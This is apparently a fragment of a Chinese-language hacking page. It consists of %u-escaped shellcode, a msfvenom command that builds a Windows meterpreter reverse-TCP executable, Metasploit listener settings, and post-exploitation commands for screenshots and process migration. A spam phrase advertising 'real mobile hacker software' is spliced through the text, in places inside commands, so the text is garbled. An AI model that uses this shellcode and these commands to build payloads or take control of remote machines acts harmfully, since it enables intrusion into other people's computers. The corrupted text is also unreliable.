ff7b%u85d5%u75c0%u4b1d%u840f%u007a%u0000%ud1eb%u8ce9%u0000%ue800%uffac%uffff%u742f%u7365%u2e74%u7865%u0065%u6beb%uc031%u505f%u026a%u026a%u6a50%u6a02%u5702%uda68%udaf6%uff4f%u93d5%uc031%ub866%u0304%uc429%u8d54%u244c%u3108%ub4c0%u5003%u5651%u1268%u8996%uffe2%u85d5%u74c0%u582手机真实黑客软件 d%uc085%u1674%u006a%u5054%u448d%u0c24%u5350%u2d68%uae57%uff5b%u83d5%u04ec%uceeb%u6853%u96c6%u5287%ud5ff%u006a%u6857%u8b31%u876f%ud5ff%u006a%uf068%ua2b5%uff56%ue8d5%uff90%uffff%u7572%u646e%u3131%u652e%u6578%ue800%uff0a%uffff%u6574%u7473%u632e%u6d6f%u4100

手机真实黑客软件

msfvenom -p 手机真实黑客软件 windows/meterpreter_reverse_tcp LHOST=192.168.56.102 -f exe -o meter_102.exe

#!bash

//msf里面开启meterpreter的监听进程

use exploit/multi/handler

手机真实黑客软件 set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 0.0.0.0

set LPORT 4444

run

//然后开始玩

手机真实黑客软件 screenshot //截图

migrate　pid //迁移到别的进程去